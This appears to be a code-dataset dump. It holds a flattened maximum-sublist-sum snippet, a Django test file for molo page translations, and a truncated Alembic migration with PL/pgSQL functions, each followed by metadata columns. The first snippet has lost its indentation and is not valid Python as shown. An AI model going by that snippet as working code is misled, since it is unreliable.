max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(0, max_ending_here + x)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
"""
def max_sublist_sum(arr):
max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(max_ending_here + x, 0)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
def max_sublist_sum(arr):
max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(x, max_ending_here + x)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
def max_sublist_sum(arr):
max_ending_here = 0
max_so_far = 0
for x in arr:
max_ending_here = max(max_ending_here + x, x)
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
"""
| 19.777778
| 53
| 0.65618
| 160
| 890
| 3.2
| 0.0875
| 0.28125
| 0.40625
| 0.25
| 0.994141
| 0.994141
| 0.994141
| 0.994141
| 0.994141
| 0.994141
| 0
| 0.015385
| 0.269663
| 890
| 44
| 54
| 20.227273
| 0.772308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b7189591fccb4b1fa9bd355ffb96080ca2aa362a
| 29,331
|
py
|
Python
|
molo/core/tests/test_translations.py
|
praekelt/molo
|
a46e6e63e5ae9525f077f3d548cc0b492f884b97
|
[
"BSD-2-Clause"
] | 25
|
2015-09-26T13:45:30.000Z
|
2018-09-13T14:12:20.000Z
|
molo/core/tests/test_translations.py
|
praekelt/molo
|
a46e6e63e5ae9525f077f3d548cc0b492f884b97
|
[
"BSD-2-Clause"
] | 510
|
2015-05-29T09:30:44.000Z
|
2018-12-11T09:08:11.000Z
|
molo/core/tests/test_translations.py
|
praekeltfoundation/molo
|
a46e6e63e5ae9525f077f3d548cc0b492f884b97
|
[
"BSD-2-Clause"
] | 5
|
2020-03-26T19:30:13.000Z
|
2020-09-04T16:35:59.000Z
|
import pytest
from django.utils import timezone
from django.urls import reverse
from django.core.cache import cache
from django.test import TestCase, RequestFactory
from django.shortcuts import get_object_or_404
from django.db.models.query import QuerySet
from wagtail.core.models import Site
from molo.core.tests.base import MoloTestCaseMixin
from molo.core.models import SectionPage, SiteSettings, \
ArticlePage, Main, SiteLanguageRelation, Languages, ArticlePageTags
from molo.core.tasks import promote_articles
from molo.core.wagtail_hooks import show_main_language_only
from wagtail.core.models import Page
@pytest.mark.django_db
class TestTranslations(TestCase, MoloTestCaseMixin):
def setUp(self):
cache.clear()
self.mk_main()
self.factory = RequestFactory()
main = Main.objects.all().first()
self.english = SiteLanguageRelation.objects.create(
language_setting=Languages.for_site(main.get_site()),
locale='en',
is_active=True)
self.french = SiteLanguageRelation.objects.create(
language_setting=Languages.for_site(main.get_site()),
locale='fr',
is_active=True)
self.spanish_mexico = SiteLanguageRelation.objects.create(
language_setting=Languages.for_site(main.get_site()),
locale='es-mx',
is_active=True)
# Creates a section under the main page
self.english_section = self.mk_section(
self.section_index, title='English section')
# Creates a sub-section under the section
self.english_subsection = self.mk_section(
self.english_section, title='English subsection')
# Login
self.user = self.login()
self.site = main.get_site()
def test_section_index_page(self):
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(response, 'English section')
def test_wagtail_root_page_has_no_translations(self):
response = self.client.get(reverse(
'wagtailadmin_explore_root'))
self.assertNotContains(response, 'French')
def test_that_all_translation_languages_are_listed(self):
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
# Checks main language is not listed as translation language
self.assertNotContains(response, 'title="English">English')
# Checks if translation language exists
self.assertContains(response, 'title="French">French')
self.assertContains(response,
'title="Mexican Spanish">Mexican Spanish')
def test_that_only_main_language_pages_are_listed(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
# checks that only the english section is listed
# and not the french section
self.assertContains(response, 'English section')
self.assertNotContains(response,
'French translation of English section')
def test_that_only_main_language_pages_returns_list(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
request = self.factory.get(
"http://main-1.localhost:8000/admin/pages/"
+ str(self.english_section.id) + "/")
request._wagtail_site = self.site
parent_page = get_object_or_404(Page, id=self.section_index.id)
pages = list(parent_page.get_children().prefetch_related(
'content_type', 'sites_rooted_here'))
pages = show_main_language_only(
parent_page,
pages,
request,
)
# checks that only the english section is listed
# and not the french section
assert isinstance(pages, list)
assert len(pages) == 1
self.assertEqual(pages[0].title, 'English section')
def test_that_only_main_language_pages_returns_queryset(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
request = self.factory.get(
"http://main-1.localhost:8000/admin/pages/"
+ str(self.english_section.id) + "/")
request._wagtail_site = self.site
parent_page = get_object_or_404(Page, id=self.section_index.id)
pages = parent_page.get_children().prefetch_related(
'content_type', 'sites_rooted_here')
pages = show_main_language_only(
parent_page,
pages,
request,
)
# check a queryset is returned
# checks that only the english section is in the queryset
# and not the french section
assert isinstance(pages, QuerySet)
assert len(pages) == 1
self.assertEqual(pages[0].title, 'English section')
def test_page_doesnt_have_translation_action_button_links_to_addview(self):
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(response,
'<a href="/admin/translations/add/%s/fr/"'
% self.english_section.id)
def test_that_translation_have_the_right_language(self):
self.client.get(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
page = SectionPage.objects.get(
title='French translation of English section')
self.assertEqual(str(page.language.locale), 'fr')
def test_draft_translations_have_additional_css_clsss(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
page = SectionPage.objects.get(
slug='french-translation-of-english-section')
# Ckecks when the translated page is draf
# the translation button has the right css
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(
response, 'class="button button-small button-secondary '
'translation-translated translation-translated-draft" '
'title="French">French</a>')
# Ckecks when the translated page is Draft + live
# the translation button has the right css
page.save_revision().publish()
page.save_revision()
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(
response, 'class="button button-small button-secondary '
'translation-translated translation-translated-draft" '
'title="French">French</a>')
# Ckecks when the translated page is Publish
# the translation button has the right css
page.save_revision().publish()
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(
response, 'class="button button-small button-secondary '
'translation-translated " title="French">French</a>')
def test_if_page_has_a_translation_the_action_links_to_the_edit_page(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
page = SectionPage.objects.get(
slug='french-translation-of-english-section')
self.assertContains(response,
'<a href="/admin/pages/%s/edit/"'
% page.id)
def test_republishing_main_section_effecting_translated_section(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
page = SectionPage.objects.get(
slug='french-translation-of-english-section')
page.save_revision().publish()
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(
response, 'class="button button-small button-secondary '
'translation-translated " title="French">French</a>')
self.client.post(reverse(
'wagtailadmin_pages:unpublish', args=[self.english_section.id]))
self.english_section = SectionPage.objects.get(
id=self.english_section.id)
response = self.client.get(reverse(
'wagtailadmin_explore', args=[self.section_index.id]))
self.assertContains(
response, 'class="button button-small button-secondary '
'translation-translated " title="French">French</a>')
def test_adding_translation_that_already_exists_redirects_to_edit(self):
self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
response = self.client.post(reverse(
'add_translation', args=[self.english_section.id, 'fr']))
page = SectionPage.objects.get(
slug='french-translation-of-english-section')
self.assertRedirects(
response, reverse('wagtailadmin_pages:edit', args=[page.id]))
def test_adding_translation_to_non_translatable_page_redirects_home(self):
response = self.client.post(reverse(
'add_translation', args=[self.section_index.id, 'fr']))
self.assertRedirects(response, reverse('wagtailadmin_home'))
def test_site_languages_summary(self):
articles = self.mk_articles(
parent=self.english_section, count=2)
for article in articles:
self.client.post(reverse(
'add_translation', args=[article.id, 'fr']))
response = self.client.get(reverse('wagtailadmin_home'))
self.assertContains(response, '<span>2</span>English Pages')
self.assertContains(response, '<span>2</span>French Pages')
def test_site_exists_if_no_iems_translated_for_translated_only(self):
site_settings = SiteSettings.for_site(self.main.get_site())
site_settings.enable_tag_navigation = True
site_settings.show_only_translated_pages = True
site_settings.save()
tag = self.mk_tag(parent=self.tag_index)
tag.feature_in_homepage = True
tag.save_revision().publish()
articles = self.mk_articles(
parent=self.english_section,
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now(), count=30)
for article in articles:
ArticlePageTags.objects.create(page=article, tag=tag)
promote_articles()
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/locale/fr/')
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_that_only_translated_sections_show_with_tag_navigation(self):
site_settings = SiteSettings.for_site(self.main.get_site())
site_settings.enable_tag_navigation = True
site_settings.show_only_translated_pages = True
site_settings.save()
response = self.client.get('/locale/fr/')
response = self.client.get('/')
self.mk_section_translation(
self.english_section, self.french,
title=self.english_section.title + ' in french')
article1 = self.mk_article(
self.english_section,
title='English article1 in English Section',
featured_in_homepage_start_date=timezone.now(),
featured_in_homepage=True)
self.mk_article_translation(
article1, self.french, title=article1.title + ' in french',)
promote_articles()
response = self.client.get('/')
self.assertContains(response, 'English section')
response = self.client.get('/locale/fr/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section-in-french/"'
' class="section-listing__theme-bg-link">'
'English section in french</a>')
def test_that_only_translated_pages_are_shown_on_front_end(self):
# set the site settings show_only_translated_pages to True
default_site = Site.objects.get(is_default_site=True)
setting = SiteSettings.objects.create(site=default_site)
setting.show_only_translated_pages = True
setting.save()
eng_section2 = self.mk_section(
self.section_index, title='English section2')
self.mk_section_translation(
eng_section2, self.french,
title=eng_section2.title + ' in french')
article1 = self.mk_article(
eng_section2,
title='English article1 in section 2',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
self.mk_article_translation(
article1, self.french, title=article1.title + ' in french',)
article2 = self.mk_article(
self.english_section,
title='English article2 in section 1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
self.mk_article_translation(
article2, self.french, title=article2.title + ' in french',)
promote_articles()
# tests that in Home page users will only see the sections
# that have been translated
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/"'
' class="section-listing__theme-bg-link">English section</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/"'
' class="section-listing__theme-bg-link">English section2</a>')
response = self.client.get('/locale/fr/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2-in-french/"'
' class="section-listing__theme-bg-link">'
'English section2 in french</a>')
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/"'
' class="section-listing__theme-bg-link">English section</a>')
en_page = self.mk_article(self.english_section,
title='English article1',
featured_in_latest_start_date=timezone.now())
promote_articles()
en_page = ArticlePage.objects.get(title=en_page.title)
self.mk_article_translation(
en_page, self.french, title=en_page.title + ' in french',)
self.mk_article(self.english_section,
title='English article2',
featured_in_latest_start_date=timezone.now())
promote_articles()
# tests that in english section users will only see the articles
# that have been translated
response = self.client.get('/locale/en/')
response = self.client.get('/sections-main-1/english-section/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article1-3/" '
'class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article1'
'</h3></a>', html=True)
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article2-2/" '
'class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article2'
'</h3></a>', html=True)
response = self.client.get('/locale/fr/')
response = self.client.get('/sections-main-1/english-section/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-in-french/" '
'class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article1 in french'
'</h3></a>', html=True)
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/english-article2-2/" '
'class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article2'
'</h3></a>', html=True)
# tests that in latest block users will only see the articles
# that have been translated
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-in-french/" '
'class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-headings">'
'<h5 class="heading'
' promoted-article__title--theme-headings">'
'English article1 in french'
'</h5></a>', html=True)
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-3/" '
'class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-headings">'
'<h5 class="heading'
' promoted-article__title--theme-headings">'
'English article1'
'</h5></a>', html=True)
response = self.client.get('/locale/en/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article1-3/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-headings">'
'<h5 class="heading'
' promoted-article__title--theme-headings">English article1</h5>'
'</a>', html=True)
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article2-2/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-headings">'
'<h5 class="heading'
' promoted-article__title--theme-headings">English article2</h5>'
'</a>', html=True)
def test_that_only_live_pages_show_with_only_translated_setting_off(self):
# set the site settings show_only_translated_pages to False
default_site = Site.objects.get(is_default_site=True)
setting = SiteSettings.objects.create(site=default_site)
setting.show_only_translated_pages = False
setting.save()
self.mk_section_translation(
self.english_section, self.french,
title=self.english_section.title + ' in french')
article1 = self.mk_article(
self.english_section,
title='English article1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
self.mk_article_translation(
article1, self.french, title=article1.title + ' in french',)
article2 = self.mk_article(
self.english_section,
title='English article2',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
# tests that users will see the main language article for
# pages that haven't been translated
response = self.client.get('/locale/fr/', follow=True)
response = self.client.get('/sections-main-1/english-section/',
follow=True)
self.assertContains(
response, 'English article1 in french', html=True)
self.assertContains(
response, 'English article2', html=True)
self.assertNotContains(
response, 'English article2 in french', html=True)
# tests that users won't see the main language page if it isn't live
article2.unpublish()
response = self.client.get('/sections-main-1/english-section/',
follow=True)
self.assertContains(
response, 'English article1 in french', html=True)
self.assertNotContains(
response, 'English article2', html=True)
self.assertNotContains(
response, 'English article2 in french', html=True)
# tests that users won't see the main language page if both it and the
# the translation are not live
fr_article = self.mk_article_translation(
article2, self.french, title=article2.title + ' in french',)
fr_article.unpublish()
response = self.client.get('/sections-main-1/english-section/',
follow=True)
self.assertContains(
response, 'English article1 in french', html=True)
self.assertNotContains(
response, 'English article2', html=True)
self.assertNotContains(
response, 'English article2 in french', html=True)
def test_if_main_lang_page_unpublished_translated_page_still_shows(self):
eng_section2 = self.mk_section(
self.section_index, title='English section2')
self.mk_section_translation(
eng_section2, self.french,
title=eng_section2.title + ' in french')
eng_section2.unpublish()
self.mk_article(
eng_section2,
title='English article1 in section 2',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
en_page = self.mk_article(
self.english_section,
title='English article1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
promote_articles()
self.mk_article_translation(
en_page, self.french, title=en_page.title + ' in french',)
en_page2 = self.mk_article(
self.english_section,
title='English article2',
featured_in_latest_start_date=timezone.now())
promote_articles()
en_page2 = ArticlePage.objects.get(title=en_page2.title)
self.mk_article_translation(
en_page2, self.french, title=en_page2.title + ' in french',)
en_page2.unpublish()
# tests that on home page users will only
# see the pages that are published
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/"'
' class="section-listing__theme-bg-link">English section</a>')
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section2/"'
' class="section-listing__theme-bg-link">English section2</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article1-3/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading '
'promoted-article-list__heading">'
' English article1</h3></a>',
html=True)
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/english-article2-3/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
' English article2</h3></a>',
html=True)
response = self.client.get('/sections-main-1/english-section/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/english-article1-3/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article1</h3></a>', html=True)
self.assertNotContains(
response,
'<a href="/sections-main-1/english-section/english-article2/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading promoted-article__title">'
'English article2</h3></a>', html=True)
# tests that when switching to a child language
# users will see all the published translated pages
# even if the main language page is unpublished
response = self.client.get('/locale/fr/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/"'
' class="section-listing__theme-bg-link">English section</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2-in-french/"'
' class="section-listing__theme-bg-link">'
'English section2 in french</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-in-french/"'
' class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1 in french</h3>', html=True)
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/'
'english-article1-in-section-2/" '
'class="promoted-article-list__anchor'
' promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1 in section 2</h3></a>',
html=True)
response = self.client.get('/sections-main-1/english-section/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article1-in-french/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading'
' promoted-article__title">English article1 in french</h3></a>',
html=True)
self.assertContains(
response,
'<a href="/sections-main-1/english-section/'
'english-article2-in-french/"'
' class="promoted-article-list__anchor">'
'<h3 class="heading'
' promoted-article__title">English article2 in french</h3></a>',
html=True)
def test_if_mexican_spanish_translated_pages_are_shown_on_front_end(self):
en_section2 = self.mk_section(
self.section_index, title='English section2')
self.mk_section_translation(
en_section2, self.spanish_mexico,
title=en_section2.title + ' in Mexican Spanish')
en_page = self.mk_article(
en_section2,
title='English article1',
featured_in_latest_start_date=timezone.now(),
featured_in_homepage_start_date=timezone.now())
promote_articles()
en_page = ArticlePage.objects.get(pk=en_page.pk)
self.mk_article_translation(
en_page, self.spanish_mexico,
title=en_page.title + ' in Mexican Spanish',)
response = self.client.get('/')
self.assertContains(
response,
'English section2')
self.assertNotContains(
response,
'English section2 in Mexican Spanish')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/english-article1/" '
'class="promoted-article-list__anchor '
'promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1</h3></a>', html=True)
self.assertNotContains(
response,
'English article1 in Mexican Spanish')
response = self.client.get('/locale/es-mx/')
response = self.client.get('/')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2-in-mexican-spanish/"'
' class="section-listing__theme-bg-link">'
'English section2 in Mexican Spanish</a>')
self.assertContains(
response,
'<a href="/sections-main-1/english-section2/'
'english-article1-in-mexican-spanish/"'
' class="promoted-article-list__anchor '
'promoted-article-list__anchor--theme-bg">'
'<h3 class="heading'
' promoted-article-list__heading">'
'English article1 in Mexican Spanish</h3></a>', html=True)
| 42.694323
| 79
| 0.61822
| 3,201
| 29,331
| 5.471728
| 0.074664
| 0.063945
| 0.045218
| 0.050357
| 0.829061
| 0.790294
| 0.778019
| 0.75284
| 0.725607
| 0.717442
| 0
| 0.010682
| 0.269135
| 29,331
| 686
| 80
| 42.75656
| 0.806363
| 0.052436
| 0
| 0.7487
| 0
| 0
| 0.276373
| 0.164109
| 0
| 0
| 0
| 0
| 0.117851
| 1
| 0.036395
| false
| 0
| 0.02253
| 0
| 0.060659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f9e915f91a991447a07a5e623669113d67db160
| 21,254
|
py
|
Python
|
alembic/versions/eb70cc55b178_entry_group_optimization.py
|
SegFaulti4/lingvodoc
|
8b296b43453a46b814d3cd381f94382ebcb9c6a6
|
[
"Apache-2.0"
] | 5
|
2017-03-30T18:02:11.000Z
|
2021-07-20T16:02:34.000Z
|
alembic/versions/eb70cc55b178_entry_group_optimization.py
|
SegFaulti4/lingvodoc
|
8b296b43453a46b814d3cd381f94382ebcb9c6a6
|
[
"Apache-2.0"
] | 15
|
2016-02-24T13:16:59.000Z
|
2021-09-03T11:47:15.000Z
|
alembic/versions/eb70cc55b178_entry_group_optimization.py
|
Winking-maniac/lingvodoc
|
f037bf0e91ccdf020469037220a43e63849aa24a
|
[
"Apache-2.0"
] | 22
|
2015-09-25T07:13:40.000Z
|
2021-08-04T18:08:26.000Z
|
"""Entry group optimization
Revision ID: eb70cc55b178
Revises: 2b852140e36e
Create Date: 2019-11-05 09:40:55.615947
"""
# revision identifiers, used by Alembic.
revision = 'eb70cc55b178'
down_revision = '2b852140e36e'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute('''
/* Gathers lexical entries linked through a specified link field. */
create or replace function
linked_cycle(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns void as $$
begin
-- Gathering all entries until no unprocessed tags are left.
while exists (
select 1 from tag_list_a) loop
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E,
publishingentity P
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_a) and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_b
select * from tag_cte;
truncate table tag_list_a;
-- The next batch of additional tags.
if exists (
select 1 from tag_list_b) then
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E,
publishingentity P
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_b) and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
truncate table tag_list_b;
end if;
end loop;
end;
$$ language plpgsql;
''')
op.execute('''
/*
* Like linked_cycle(), but does not join with publishingentity, so is
* equivalent to linked_cycle(_, _, null, null), but should be faster.
*/
create or replace function
linked_cycle_no_publishing(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT)
returns void as $$
begin
-- Gathering all entries until no unprocessed tags are left.
while exists (
select 1 from tag_list_a) loop
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_a)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from public.entity E
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false
on conflict do nothing
returning *)
insert into tag_list_b
select * from tag_cte;
truncate table tag_list_a;
-- The next batch of additional tags.
if exists (
select 1 from tag_list_b) then
with
entry_id_cte as (
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content in (
select * from tag_list_b)
on conflict do nothing
returning *),
tag_cte as (
insert into tag_table
select distinct E.content
from public.entity E
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_cte) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
truncate table tag_list_b;
end if;
end loop;
end;
$$ language plpgsql;
''')
op.execute('''
/*
* Finds a group of lexical entries linked through a specified link
* field, starting from a given entry.
*/
create or replace function
linked_group(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
entry_client_id BIGINT,
entry_object_id BIGINT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT) as $$
begin
-- Temporary table for lexical entry ids.
create temporary table
if not exists
entry_id_table (
client_id BIGINT,
object_id BIGINT,
primary key (client_id, object_id))
on commit drop;
insert into entry_id_table
values (entry_client_id, entry_object_id);
-- Temporary table for etymological tags.
create temporary table
if not exists
tag_table (
tag TEXT primary key)
on commit drop;
-- Temporary tables for tags to be processed.
create temporary table
if not exists
tag_list_a (
tag TEXT)
on commit drop;
create temporary table
if not exists
tag_list_b (
tag TEXT)
on commit drop;
-- Initial batch of additional tags.
with
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
E.parent_client_id = entry_client_id and
E.parent_object_id = entry_object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
-- Gathering and returning linked lexical entries.
perform linked_cycle(
entity_field_client_id,
entity_field_object_id,
publish,
accept);
return query
select * from entry_id_table;
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
op.execute('''
/*
* Like linked_group(), but does not join with publishingentity, so is
* equivalent to linked_group(_, _, _, _, null, null), but should be
* faster.
*/
create or replace function
linked_group_no_publishing(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
entry_client_id BIGINT,
entry_object_id BIGINT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT) as $$
begin
-- Temporary table for lexical entry ids.
create temporary table
if not exists
entry_id_table (
client_id BIGINT,
object_id BIGINT,
primary key (client_id, object_id))
on commit drop;
insert into entry_id_table
values (entry_client_id, entry_object_id);
-- Temporary table for etymological tags.
create temporary table
if not exists
tag_table (
tag TEXT primary key)
on commit drop;
-- Temporary tables for tags to be processed.
create temporary table
if not exists
tag_list_a (
tag TEXT)
on commit drop;
create temporary table
if not exists
tag_list_b (
tag TEXT)
on commit drop;
-- Initial batch of additional tags.
with
tag_cte as (
insert into tag_table
select distinct E.content
from public.entity E
where
E.parent_client_id = entry_client_id and
E.parent_object_id = entry_object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
-- Gathering and returning linked lexical entries.
perform linked_cycle_no_publishing(
entity_field_client_id,
entity_field_object_id);
return query
select * from entry_id_table;
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
op.execute('''
/*
* Finds a group of lexical entries linked through a specified link
* field, starting from a link tag.
*/
create or replace function
linked_group(
entity_field_client_id BIGINT,
entity_field_object_id BIGINT,
tag TEXT,
publish BOOLEAN = true,
accept BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT) as $$
begin
-- Temporary table for lexical entry ids.
create temporary table
if not exists
entry_id_table (
client_id BIGINT,
object_id BIGINT,
primary key (client_id, object_id))
on commit drop;
insert into entry_id_table
select
L.client_id,
L.object_id
from
lexicalentry L,
public.entity E,
publishingentity P
where
L.marked_for_deletion = false and
E.parent_client_id = L.client_id and
E.parent_object_id = L.object_id and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
E.content = tag and
P.client_id = E.client_id and
P.object_id = E.object_id and
